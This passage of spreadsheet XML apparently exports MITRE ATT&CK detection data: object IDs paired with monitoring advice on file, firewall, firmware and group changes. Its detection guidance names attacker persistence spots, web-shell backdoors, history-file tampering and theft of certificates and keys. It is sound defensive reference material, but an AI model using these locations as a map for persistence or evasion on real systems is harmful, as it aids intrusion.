    <t>relationship--90300d17-ca66-4167-a2c5-e8521b291ef7</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.</t>
  </si>
  <si>
    <t>relationship--14bc8e2b-387b-4e84-9e3c-15eee909d30a</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</si>
  <si>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</si>
  <si>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relationship--e5efeda7-cfe9-42e3-a015-6cf25071caa5</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems.</t>
  </si>
  <si>
    <t>relationship--aaf68c56-f476-4952-a622-d9951212c2a2</t>
  </si>
  <si>
    <t>Monitor for changes made to files that are modified by unusual accounts outside of normal administration duties.</t>
  </si>
  <si>
    <t>relationship--0a10c38f-58fc-4619-be86-d67f62495242</t>
  </si>
  <si>
    <t>Monitor for changes made to command history files, such as ConsoleHost_history.txt, ~/.zsh_history, or ~/.bash_history, for unexpected modifications to contents, access permissions, and attributes.
&lt;h4&gt; Analytic 1 : Modification of access rights to command history files &lt;/h4&gt;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t>
  </si>
  <si>
    <t>relationship--e7431ae7-4c26-4043-97d0-31835828ba73</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for changes made to system log files, typically stored in  /var/log or /Library/Logs, for unexpected modifications to access permissions and attributes </t>
  </si>
  <si>
    <t>relationship--793aca65-2d1b-487d-96f1-a7b3d4b18026</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</si>
  <si>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</si>
  <si>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relationship--5f9087bc-6a55-4d7e-947f-b8a6d9cd550a</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</si>
  <si>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</si>
  <si>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relationship--ead78847-ea3b-4511-ab4e-a54f5489fb58</t>
  </si>
  <si>
    <t>Monitor for changes made to a file may delete or alter generated artifacts associated with persistence on a host system.</t>
  </si>
  <si>
    <t>relationship--3a8964df-801d-407c-8233-9a7365d2882d</t>
  </si>
  <si>
    <t>Monitor changes to client software that do not correlate with known software or patch cycles.</t>
  </si>
  <si>
    <t>relationship--771be88b-9e5f-467f-81f4-349ddd54fc42</t>
  </si>
  <si>
    <t>Monitor for changes to files associated with system-level processes.</t>
  </si>
  <si>
    <t>relationship--a6ad0908-e975-47d7-9c82-c4dfa9e16c3b</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for changes made to files for unexpected modifications to access permissions and attributes </t>
  </si>
  <si>
    <t>relationship--11ff467e-83b2-4293-bec8-4837784534c5</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</si>
  <si>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</si>
  <si>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relationship--049e2b29-7554-4f2d-bba3-caaa98aa29b6</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for changes made to files for unexpected modifications to access permissions and attributes  </t>
  </si>
  <si>
    <t>relationship--560364b1-d3ab-465c-88e8-000a89a7e7d7</t>
  </si>
  <si>
    <t>Monitor for changes made to a large quantity of files for unexpected modifications in user directories and under C:\Windows\System32\.</t>
  </si>
  <si>
    <t>relationship--bcaff7af-da99-45cd-a29e-e5d0cc52a48c</t>
  </si>
  <si>
    <t>Monitor for changes made to files in user directories.</t>
  </si>
  <si>
    <t>relationship--439987aa-363c-43be-aced-969b2224cc52</t>
  </si>
  <si>
    <t>Monitor for unexpected files with manipulated data in order to manipulate external outcomes or hide activity</t>
  </si>
  <si>
    <t>relationship--e7dbc99e-38be-4534-b49b-14e1e3281140</t>
  </si>
  <si>
    <t>Monitor for changes made to files for unexpected modifications to internal and external websites for unplanned content changes.</t>
  </si>
  <si>
    <t>relationship--edb9e1fa-5862-464e-8d71-5e17b27f6bfc</t>
  </si>
  <si>
    <t>attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c</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</si>
  <si>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</si>
  <si>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relationship--e0fce318-55f7-4205-8239-3fca6fff6d90</t>
  </si>
  <si>
    <t>attack-pattern--7efba77e-3bc4-4ca5-8292-d8201dcd64b5</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</si>
  <si>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</si>
  <si>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relationship--5ef47387-c35c-432a-9822-d7e9cd1370c6</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor changes made to the `/etc/audit/audit.rules` file containing the sequence of `auditctl` commands loaded at boot time. </t>
  </si>
  <si>
    <t>relationship--9871211f-1e9a-45f0-8cc6-bc01349a4a62</t>
  </si>
  <si>
    <t>attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605</t>
  </si>
  <si>
    <t>Monitor for changes to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)</t>
  </si>
  <si>
    <t>relationship--af2ed82a-83d6-4fea-b8d0-30c7d0fd8682</t>
  </si>
  <si>
    <t>attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d</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</si>
  <si>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</si>
  <si>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relationship--b3a53caa-e32b-4094-b8e7-f22cf7ccd548</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</si>
  <si>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</si>
  <si>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relationship--b9b487ad-f3ad-4065-8cff-efd62135c1f1</t>
  </si>
  <si>
    <t>Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD on Linux and DYLD_INSERT_LIBRARIES on macOS.</t>
  </si>
  <si>
    <t>relationship--8a53ab66-841f-4c04-8648-57cb9896089b</t>
  </si>
  <si>
    <t>On MacOS systems, monitor for modifications to the &lt;code&gt;RulesActiveState.plist&lt;/code&gt;, &lt;code&gt;SyncedRules.plist&lt;/code&gt;, &lt;code&gt;UnsyncedRules.plist&lt;/code&gt;, and &lt;code&gt;MessageRules.plist&lt;/code&gt; files.(Citation: MacOS Email Rules)</t>
  </si>
  <si>
    <t>relationship--f064cee8-323a-4bc5-8046-7325eb2401a5</t>
  </si>
  <si>
    <t>Monitor emond rules creation by checking for files modified in &lt;code&gt;/etc/emond.d/rules/&lt;/code&gt; and &lt;code&gt;/private/var/db/emondClients&lt;/code&gt;.</t>
  </si>
  <si>
    <t>relationship--df2305ae-62e0-4394-aa37-18c960380069</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events.</t>
  </si>
  <si>
    <t>relationship--83b38947-8b1f-423d-847d-ee85b2631785</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for changes to binaries and service executables that may normally occur during software updates. </t>
  </si>
  <si>
    <t>relationship--080702d5-0c8d-444f-817e-afabb83a105a</t>
  </si>
  <si>
    <t>Monitor external websites for unplanned content changes.</t>
  </si>
  <si>
    <t>relationship--42a6136c-1aaf-4df1-b7cb-aceb7252f1e0</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for changes made to the .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources </t>
  </si>
  <si>
    <t>relationship--617a2fc2-b58f-4074-bef7-afce7615c6f3</t>
  </si>
  <si>
    <t>The removal of the &lt;code&gt;com.apple.quarantine&lt;/code&gt; flag by a user instead of the operating system is a suspicious action and should be examined further. Also monitor software update frameworks that may strip this flag when performing updates.</t>
  </si>
  <si>
    <t>relationship--b45d1bb3-5254-4fc5-ada0-d360584b174c</t>
  </si>
  <si>
    <t>attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04</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</si>
  <si>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</si>
  <si>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relationship--35a70cfa-6bd8-4ff6-93e0-6fca903223f5</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</si>
  <si>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</si>
  <si>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relationship--0b5d6b32-8402-49c0-9b30-336da6d77c73</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</si>
  <si>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</si>
  <si>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relationship--27cdb886-b7be-4a6a-b740-f4c6a0a2e412</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may attempt to hide artifacts associated with their behaviors to evade detection.</t>
  </si>
  <si>
    <t>relationship--876be539-dc82-4714-b66a-93109a63822e</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</si>
  <si>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</si>
  <si>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relationship--7fe77b6f-4b95-4d27-976f-a2a2fbfca479</t>
  </si>
  <si>
    <t>Monitor for suspicious modification of files associated with hybrid identity authentication processes, such as configuration files. Monitor for access to certificates and cryptographic keys material.</t>
  </si>
  <si>
    <t>relationship--1242a136-1b26-43e4-b0af-2bdbc5edfb58</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</si>
  <si>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</si>
  <si>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relationship--e80b4eeb-42cf-4017-95b3-05733a4e800c</t>
  </si>
  <si>
    <t>Monitor changes made to configuration files that contain settings for logging and defensive tools.</t>
  </si>
  <si>
    <t>relationship--155554a0-2a5b-44e3-9942-562b8b0e30c0</t>
  </si>
  <si>
    <t>Monitor for changes made to a file may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.</t>
  </si>
  <si>
    <t>relationship--12139a3a-72d6-4ce5-a987-fc319c8c77f7</t>
  </si>
  <si>
    <t>relationship--144433cb-ce74-48db-b914-8362254d400e</t>
  </si>
  <si>
    <t>Monitor internal and websites for unplanned content changes.</t>
  </si>
  <si>
    <t>relationship--e826208c-5738-4a75-8951-84819ed4f2b1</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may modify the kernel to automatically execute programs on system boot.</t>
  </si>
  <si>
    <t>relationship--88978f6c-242d-4a80-be15-a142ce76e80a</t>
  </si>
  <si>
    <t>Monitor file systems for changes to application binaries and invalid checksums/signatures.</t>
  </si>
  <si>
    <t>relationship--951dd0b4-52c4-4f56-bdcd-c76a24b2ba49</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may modify or add LSASS drivers to obtain persistence on compromised systems.</t>
  </si>
  <si>
    <t>relationship--b3ac615e-8af1-4d96-a6c3-dfa0ac1bc0ac</t>
  </si>
  <si>
    <t>Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.</t>
  </si>
  <si>
    <t>relationship--115c34e4-0ddb-44be-9699-bf54433d5d7a</t>
  </si>
  <si>
    <t>Monitor files for changes that may create or modify Launch Daemons to execute malicious payloads as part of persistence.</t>
  </si>
  <si>
    <t>relationship--6263dd52-7242-4b16-9483-8a13063bf193</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</si>
  <si>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</si>
  <si>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relationship--a68c1482-d13d-41f1-98b0-01c78812b0ae</t>
  </si>
  <si>
    <t>Monitor for changes to login hook files (&lt;code&gt;/Library/Preferences/com.apple.loginwindow.plist&lt;/code&gt;), especially by unusual accounts outside of normal administration duties.</t>
  </si>
  <si>
    <t>relationship--3ac0aee3-9da3-4049-adee-8503e4b4f42a</t>
  </si>
  <si>
    <t>relationship--7d4149dc-1387-40cc-8f84-2f111e01ceb4</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</si>
  <si>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</si>
  <si>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relationship--2c880adf-243c-410b-8237-3c12ed51d7c6</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</si>
  <si>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</si>
  <si>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relationship--0b844ba8-534f-4702-8ea5-50fd7b5f46a0</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</si>
  <si>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</si>
  <si>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relationship--84335309-0b5d-4005-84c1-401bdd42c606</t>
  </si>
  <si>
    <t>attack-pattern--ae7f3575-0a5e-427e-991b-fe03ad44c754</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</si>
  <si>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</si>
  <si>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relationship--feb29d58-b733-47a4-9d56-8d45b36f0978</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</si>
  <si>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</si>
  <si>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relationship--4ebbf5d1-0205-4899-9d08-8a9601355c64</t>
  </si>
  <si>
    <t>attack-pattern--fa44a152-ac48-441e-a524-dd7b04b8adcd</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</si>
  <si>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</si>
  <si>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relationship--0e228243-0539-4315-9443-289ed5f7ab10</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for changes made to files for unexpected modifications to unusual accounts outside of normal administration duties  </t>
  </si>
  <si>
    <t>relationship--a5ec708f-a82c-4890-a3a2-fe2455e2ebaf</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may leverage Microsoft Office-based applications for persistence between startups.</t>
  </si>
  <si>
    <t>relationship--9a49976f-d9bd-481e-a8b2-25cb1531dc75</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</si>
  <si>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</si>
  <si>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relationship--ebae4e41-0925-46af-b7bf-aba3ea0c25ec</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system.</t>
  </si>
  <si>
    <t>relationship--85485375-fa2c-4757-9ca8-a8013b2cb364</t>
  </si>
  <si>
    <t>attack-pattern--d245808a-7086-4310-984a-a84aaaa43f8f</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</si>
  <si>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</si>
  <si>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relationship--dd7875c3-fbe2-4b9a-a580-9e730a619610</t>
  </si>
  <si>
    <t>Monitor for programs metadata modifications such as deletion of the path to an executable since it makes programs vulnerable to this type of technique. Also, monitor modifications of files such as renaming programs using Windows system utilities names.</t>
  </si>
  <si>
    <t>relationship--cc57b78b-5df8-470e-b85c-a6f41df44a8d</t>
  </si>
  <si>
    <t>08 April 2022</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may execute their own malicious payloads by hijacking vulnerable file path references.</t>
  </si>
  <si>
    <t>relationship--3fbe7146-c706-446c-a3ea-6a0704812835</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</si>
  <si>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</si>
  <si>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relationship--c2fd3989-eb79-4a13-93ca-8ac8dfcb0ac0</t>
  </si>
  <si>
    <t>attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771</t>
  </si>
  <si>
    <t>Monitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.</t>
  </si>
  <si>
    <t>relationship--beb64039-e39c-4cf4-a2f1-401427f26ebc</t>
  </si>
  <si>
    <t>Monitor for unexpected changes to configuration files associated with the power settings of a system.</t>
  </si>
  <si>
    <t>relationship--31e28b94-aa2e-4681-9e1b-70d5b652af62</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</si>
  <si>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</si>
  <si>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relationship--265b6107-87c7-42c7-bc82-a7df3c7d3bfa</t>
  </si>
  <si>
    <t>attack-pattern--d201d4cc-214d-4a74-a1ba-b3fa09fd4591</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</si>
  <si>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</si>
  <si>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relationship--463051f0-c988-447c-9820-34e16ad61898</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.</t>
  </si>
  <si>
    <t>relationship--7a4db44b-6747-4d9a-9436-6a64d755a8d2</t>
  </si>
  <si>
    <t>Monitor for changes made to files for unexpected modifications to RC scripts in the /etc/ directory</t>
  </si>
  <si>
    <t>relationship--76d36590-def6-4fd4-ad2b-5862876adfb6</t>
  </si>
  <si>
    <t>relationship--ec6017be-71ca-4ac3-a7de-26ab47f9c826</t>
  </si>
  <si>
    <t>attack-pattern--3a40f208-a9c1-4efa-a598-4003c3681fb8</t>
  </si>
  <si>
    <t>relationship--cfc160e0-af9b-4bff-aacf-7ebb7c909be0</t>
  </si>
  <si>
    <t>Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including the startup folders. (Citation: TechNet Autoruns)</t>
  </si>
  <si>
    <t>relationship--28f9eaad-08f6-4f14-a74d-192c28251819</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</si>
  <si>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</si>
  <si>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relationship--7c7886ee-44c0-4ae1-ab2c-73fdea9e111b</t>
  </si>
  <si>
    <t>Monitor for changes and the existence of unrecognized DLLs, drivers, devices, services, and to the MBR. (Citation: Wikipedia Rootkit)</t>
  </si>
  <si>
    <t>relationship--fe6fc2bb-5d96-4684-98bc-fa408e71de5a</t>
  </si>
  <si>
    <t>relationship--2cac6e77-7575-4f8f-89f4-e03b400257bb</t>
  </si>
  <si>
    <t>attack-pattern--543fceb5-cb92-40cb-aacf-6913d4db58bc</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</si>
  <si>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</si>
  <si>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relationship--a51c66ad-3359-4119-96c2-6e35b2411578</t>
  </si>
  <si>
    <t>Monitor for changes made to detect changes made to the authorized_keys file for each user on a system. Monitor for changes to and suspicious processes modifiying /etc/ssh/sshd_config.</t>
  </si>
  <si>
    <t>relationship--690600a7-d041-4cb0-a92b-76f59d8a6343</t>
  </si>
  <si>
    <t>Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.</t>
  </si>
  <si>
    <t>relationship--030d00cc-3e9e-4ca1-ab89-e956127d9023</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code.</t>
  </si>
  <si>
    <t>relationship--d94c8e3f-337f-4d56-990f-8ff0d16dca3b</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</si>
  <si>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</si>
  <si>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relationship--254293f3-36af-41fa-9ce8-ea584258f3ba</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may abuse legitimate extensible development features of servers to establish persistent access to systems.</t>
  </si>
  <si>
    <t>relationship--1eb48dcf-5255-4cf4-aaf4-64d3a8b7dfa8</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may stop or disable services on a system to render those services unavailable to legitimate users.</t>
  </si>
  <si>
    <t>relationship--3495a807-c530-4128-bdca-44363c55e669</t>
  </si>
  <si>
    <t>Monitor for modification of binaries and service executables that do not occur during a regular software update or an update scheduled by the organization. Modification of files considers actions such as renaming and directory moving.</t>
  </si>
  <si>
    <t>relationship--19198d4f-e858-4288-a7cb-e2ec03134de7</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may perform shell escapes or exploit vulnerabilities in an application with the setsuid or setgid bits to get code running in a different user’s context.</t>
  </si>
  <si>
    <t>relationship--f6b38431-d625-41e6-9785-044b5d26f6fd</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</si>
  <si>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</si>
  <si>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relationship--090866bb-20be-4955-84f0-e581b2d5890a</t>
  </si>
  <si>
    <t>Monitor for changes made to files for unexpected modifications to /Library/StartupItem folder</t>
  </si>
  <si>
    <t>relationship--c01dea94-ab42-438b-953f-49c00dd93846</t>
  </si>
  <si>
    <t>relationship--6fadb5dc-ba19-40da-8efc-a23fe7fdaac5</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</si>
  <si>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</si>
  <si>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relationship--8c041b13-34d6-4da5-8a80-0dade355953d</t>
  </si>
  <si>
    <t>relationship--10479c4a-8992-4298-9130-39186e60b18c</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may abuse system services or daemons to execute commands or programs.</t>
  </si>
  <si>
    <t>relationship--a80868e7-bdbe-4a16-b6ad-145e5f83e1ed</t>
  </si>
  <si>
    <t>relationship--ae260a19-f992-4f2e-a0c8-beeef389bb70</t>
  </si>
  <si>
    <t>Monitor for changes made to systemd timer unit files for unexpected modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links</t>
  </si>
  <si>
    <t>relationship--21c6fdbf-ec0e-4736-a298-b44bf3e80740</t>
  </si>
  <si>
    <t>Monitor for files that write or overwrite many files to a network shared directory may be suspicious.</t>
  </si>
  <si>
    <t>relationship--d013882b-1092-46e4-8c07-f74e5ca2df97</t>
  </si>
  <si>
    <t>Monitor unexpected changes and/or interactions with &lt;code&gt;termsrv.dll&lt;/code&gt;, which is typically stored in &lt;code&gt;%SystemRoot%\System32\&lt;/code&gt;.</t>
  </si>
  <si>
    <t>relationship--ac3e9795-b828-4186-bdc8-3ee8e9b57aa1</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for unexpected modifications to file timestamps </t>
  </si>
  <si>
    <t>relationship--32dde0d4-74b9-4a01-ab13-4c227c519797</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may establish persistence by executing malicious content triggered by an interrupt signal.</t>
  </si>
  <si>
    <t>relationship--ad218869-4efa-423e-9ab2-1da36ce694fb</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</si>
  <si>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</si>
  <si>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relationship--68672a56-6b53-4fdd-a574-5a24bec1a330</t>
  </si>
  <si>
    <t>attack-pattern--1f9012ef-1e10-4e48-915e-e03563435fe8</t>
  </si>
  <si>
    <t>relationship--0ffeeaae-4cc0-4201-ac08-edf5abca7861</t>
  </si>
  <si>
    <t>attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e</t>
  </si>
  <si>
    <t>Monitor for changes made to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content.</t>
  </si>
  <si>
    <t>relationship--21f6253e-77e6-47ee-a9bb-c4900d871727</t>
  </si>
  <si>
    <t>Monitor for changes made to files that may backdoor web servers with web shells to establish persistent access to systems.</t>
  </si>
  <si>
    <t>relationship--ae87233d-19b8-4957-9795-4885f970ba6c</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</si>
  <si>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</si>
  <si>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relationship--d2d8c9da-0ba9-4136-8db5-a9c03e5bc4ba</t>
  </si>
  <si>
    <t>Firewall Disable</t>
  </si>
  <si>
    <t>x-mitre-data-component--c97d0171-f6e0-4415-85ff-4082fdb8c72a</t>
  </si>
  <si>
    <t>attack-pattern--77532a55-c283-4cd2-bc5d-2d0b65e9d88c</t>
  </si>
  <si>
    <t>Monitor for changes in the status of the system firewall such as Windows Security Auditing events 5025 (The Windows firewall service has been stopped) and 5034 (The Windows firewall driver was stopped).</t>
  </si>
  <si>
    <t>relationship--62b24ac0-b55c-42fa-bbf3-80ab7ba620d9</t>
  </si>
  <si>
    <t>relationship--ce39c6b0-7fb5-4afe-8430-cdeb62ae92ac</t>
  </si>
  <si>
    <t>relationship--fe89ee6f-dc2c-4e0c-9279-df6bafbcc333</t>
  </si>
  <si>
    <t>Firewall Enumeration</t>
  </si>
  <si>
    <t>x-mitre-data-component--bf91faa8-0049-4870-810a-4df55e0b77ee</t>
  </si>
  <si>
    <t>Monitor for an extracted list of available firewalls and/or their associated settings/rules (ex: Azure Network Firewall CLI Show commands)</t>
  </si>
  <si>
    <t>relationship--e6b3936b-95ca-424f-976c-4bde55b8e8b9</t>
  </si>
  <si>
    <t>relationship--c965212c-f60d-4814-97ce-bbbb83382703</t>
  </si>
  <si>
    <t>Firewall Metadata</t>
  </si>
  <si>
    <t>x-mitre-data-component--746f095a-f84c-4ccc-90a5-c7caa5c100a2</t>
  </si>
  <si>
    <t>Monitor for contextual data about a firewall and activity around it such as name, policy, or status</t>
  </si>
  <si>
    <t>relationship--7296a94e-49f1-40b9-ae7a-42dd0ffa143c</t>
  </si>
  <si>
    <t>relationship--f981bdff-fc4b-4539-82d9-0e69468148dc</t>
  </si>
  <si>
    <t>Firewall Rule Modification</t>
  </si>
  <si>
    <t>x-mitre-data-component--d2ff4b56-8351-4ed8-b0fb-d8605366005f</t>
  </si>
  <si>
    <t>Monitor for changes made to firewall rules, especially unexpected modifications that may potentially be related to allowing and/or cleaning up previous tampering that enabled malicious network traffic.</t>
  </si>
  <si>
    <t>relationship--c4c83769-f5e3-4556-85b8-140060c6c0d0</t>
  </si>
  <si>
    <t>relationship--e8a85d1b-fc69-4c16-b57e-b4950cdc7731</t>
  </si>
  <si>
    <t>Monitor for changes made to firewall rules that might allow remote communication over protocols such as SMD and RDP. Modification of firewall rules might also consider opening local ports and services for different network profiles such as public and domain.</t>
  </si>
  <si>
    <t>relationship--3dca7d3d-0869-4255-a565-cccd3c72a332</t>
  </si>
  <si>
    <t>Monitor for changes made to firewall rules for unexpected modifications to allow/block specific network traffic that may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms.</t>
  </si>
  <si>
    <t>relationship--522c6f48-e608-420d-a5c8-ded1002149a6</t>
  </si>
  <si>
    <t>relationship--2980b44a-0c1b-43ba-b99a-17753a30b3e5</t>
  </si>
  <si>
    <t>Firmware Modification</t>
  </si>
  <si>
    <t>x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd</t>
  </si>
  <si>
    <t>Monitor for changes that may reveal indicators of malicious firmware such as strings. Also consider comparing components, including hashes of component firmware and behavior, against known good images.</t>
  </si>
  <si>
    <t>relationship--0d3e8130-8631-49b6-9154-d2a58b5468ea</t>
  </si>
  <si>
    <t>attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89</t>
  </si>
  <si>
    <t>Monitor for changes made to the firmware for unexpected modifications to settings and/or data. (Citation: MITRE Trustworthy Firmware Measurement) Log attempts to read/write to BIOS and compare against known patching behavior.</t>
  </si>
  <si>
    <t>relationship--b0a4f26e-9517-41ff-a4cb-c4e0b9934e68</t>
  </si>
  <si>
    <t>Monitor for changes made to firmware for unexpected modifications to settings and/or data that may use a hidden file system to conceal malicious activity from users and security tools. [Bootkit](https://attack.mitre.org/techniques/T1542/003)</t>
  </si>
  <si>
    <t>relationship--14534636-d9cf-408f-b878-c25d59cd4714</t>
  </si>
  <si>
    <t>Monitor for changes made to firewall rules for unexpected modifications to allow/block specific network traffic that may attempt to hide artifacts associated with their behaviors to evade detection.</t>
  </si>
  <si>
    <t>relationship--8fe39e12-a59d-4237-b2f1-d473c1246d20</t>
  </si>
  <si>
    <t>Monitor for changes made on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI</t>
  </si>
  <si>
    <t>relationship--e79c9756-9b81-4711-8e35-6ea330f152a1</t>
  </si>
  <si>
    <t>attack-pattern--a6557c75-798f-42e4-be70-ab4502e0a3bc</t>
  </si>
  <si>
    <t>relationship--5e24d0cf-dc61-4894-b2fa-0f8f96650c41</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</si>
  <si>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</si>
  <si>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relationship--5409161f-242a-4e80-b908-ffd1537709a9</t>
  </si>
  <si>
    <t>attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada</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</si>
  <si>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</si>
  <si>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relationship--58af622a-fa2a-40ec-9439-d0caa766e796</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</si>
  <si>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</si>
  <si>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relationship--eefcbce1-d2b4-40cb-a07d-7735b256c868</t>
  </si>
  <si>
    <t>Group Enumeration</t>
  </si>
  <si>
    <t>x-mitre-data-component--8e44412e-3238-4d64-8878-4f11e27784fe</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for an extracted list of available groups and/or their associated setting </t>
  </si>
  <si>
    <t>relationship--9e2d90d1-de00-4a79-9134-279eb3bee540</t>
  </si>
  <si>
    <t>Monitor for logging that may suggest a list of available groups and/or their associated settings has been extracted, ex. Windows EID 4798 and 4799.</t>
  </si>
  <si>
    <t>relationship--671e2f7d-21e4-4eb5-b2f3-aa55910c0f13</t>
  </si>
  <si>
    <t>16 June 2022</t>
  </si>
  <si>
    <t>relationship--3b881d5f-c863-4146-9e1a-4b1682030b29</t>
  </si>
  <si>
    <t>relationship--5508061c-abeb-4c96-8daf-cb0d612bce08</t>
  </si>
  <si>
    <t>relationship--a637e1c6-e82a-430b-b4cf-880b1d3af9ea</t>
  </si>
  <si>
    <t>Monitor for an extracted list of ACLs of available groups and/or their associated settings.</t>
  </si>
  <si>
    <t>relationship--b714edbb-1dff-4e53-b474-127cbf531452</t>
  </si>
  <si>
    <t>Group Metadata</t>
  </si>
  <si>
    <t>x-mitre-data-component--8d8c7cac-94cf-4726-8989-cab33851168c</t>
  </si>
  <si>
    <t xml:space="preserve">Contextual data about a group which describes group and activity around it that may attempt to find cloud groups and permission settings. </t>
  </si>
  <si>
    <t>relationship--9c5b1767-f7cc-4807-887c-92e09a8a706f</t>
  </si>
  <si>
    <t>Monitor for contextual data about a group which describes group and activity around it.</t>
  </si>
  <si>
    <t>relationship--4505f967-fc2f-4b7a-af91-95b481af0a0b</t>
  </si>
  <si>
    <t>Group Modification</t>
  </si>
  <si>
    <t>x-mitre-data-component--05d5b5b4-ef93-4807-b05f-33d8c5a35bc5</t>
  </si>
  <si>
    <t>Monitor events for changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.</t>
  </si>
  <si>
    <t>relationship--993c7f96-4711-4b3e-bf93-63d1a5379b92</t>
  </si>
  <si>
    <t>Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions (including memberships in privileged groups) being granted to compromised accounts.</t>
  </si>
  <si>
    <t>relationship--8dfc49f1-b57c-4259-b27c-dd65a564f716</t>
  </si>
  <si>
    <t>Host Status</t>
  </si>
  <si>
    <t>x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6</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</si>
  <si>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</si>
  <si>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relationship--74dbd1f0-759a-46a1-a598-5c76b2035aef</t>
  </si>
  <si>
    <t>relationship--5b8a3669-1d3e-4855-acac-34c60a4a2e02</t>
  </si>
  <si>
    <t>attack-pattern--39131305-9282-45e4-ac3b-591d2d4fc3ef</t>
  </si>
  <si>
    <t>Perform physical inspection of hardware to look for potential tampering. Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes and and compare against known good baseline behavior.</t>
  </si>
  <si>
    <t>relationship--ce04ddee-b6e1-49fa-bd25-c40757275844</t>
  </si>
  <si>
    <t>attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3</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</si>
  <si>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</si>
  <si>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relationship--5f5972b4-cb84-4277-83fb-55f0b210a25d</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</si>
  <si>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</si>
  <si>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relationship--35f2bf9c-b70c-4c45-b319-0fd728b0cce9</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</si>
  <si>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</si>
  <si>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relationship--144b1ada-c2cc-40ae-8a95-a509a63e8bd8</t>
  </si>
  <si>
    <t>relationship--8b1d88b8-7990-4fef-9dd0-1a422a81d62c</t>
  </si>
  <si>
    <t>Users checking or changing their &lt;code&gt;HISTCONTROL&lt;/code&gt;, &lt;code&gt;HISTFILE&lt;/code&gt;, or &lt;code&gt;HISTFILESIZE&lt;/code&gt; environment variables may be suspicious.</t>
  </si>
  <si>
    <t>relationship--7c99fea0-3497-4eec-aca9-5ffdcdec52d9</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</si>
  <si>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</si>
  <si>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relationship--d84b4fa0-9da7-4341-a123-f72ceb895fe5</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</si>
  <si>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</si>
  <si>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relationship--62359eba-e21f-46f1-9fb2-a3ec9d52acb3</t>
  </si>
  <si>
    <t>attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab</t>
  </si>
  <si>
    <t>relationship--a0e02917-ad4d-4f84-bd50-9187a60db0fe</t>
  </si>
  <si>
    <t>attack-pattern--0df05477-c572-4ed6-88a9-47c581f548f7</t>
  </si>
  <si>
    <t>relationship--dbf65e94-35f3-4297-b99c-7f9b0323586c</t>
  </si>
  <si>
    <t>attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01</t>
  </si>
  <si>
    <t>relationship--c6dd4b70-2a14-4235-a583-e8ab6824d58d</t>
  </si>
  <si>
    <t>Consider monitoring process resource usage to determine anomalous activity associated with malicious hijacking of computer resources such as CPU, memory, and graphics processing resources.</t>
  </si>
  <si>
    <t>relationship--bb0c3e58-eb53-448f-b1a0-ced854c6d4b0</t>
  </si>
  <si>
    <t>relationship--14a683fd-aa9f-4596-a0e1-5e7ae4c2e4eb</t>
  </si>
  <si>
    <t>attack-pattern--bef8aaee-961d-4359-a308-4c2182bcedff</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</si>
  <si>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</si>
  <si>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relationship--f80c8dba-ec59-485b-8ee9-df387e1ceb79</t>
  </si>
  <si>
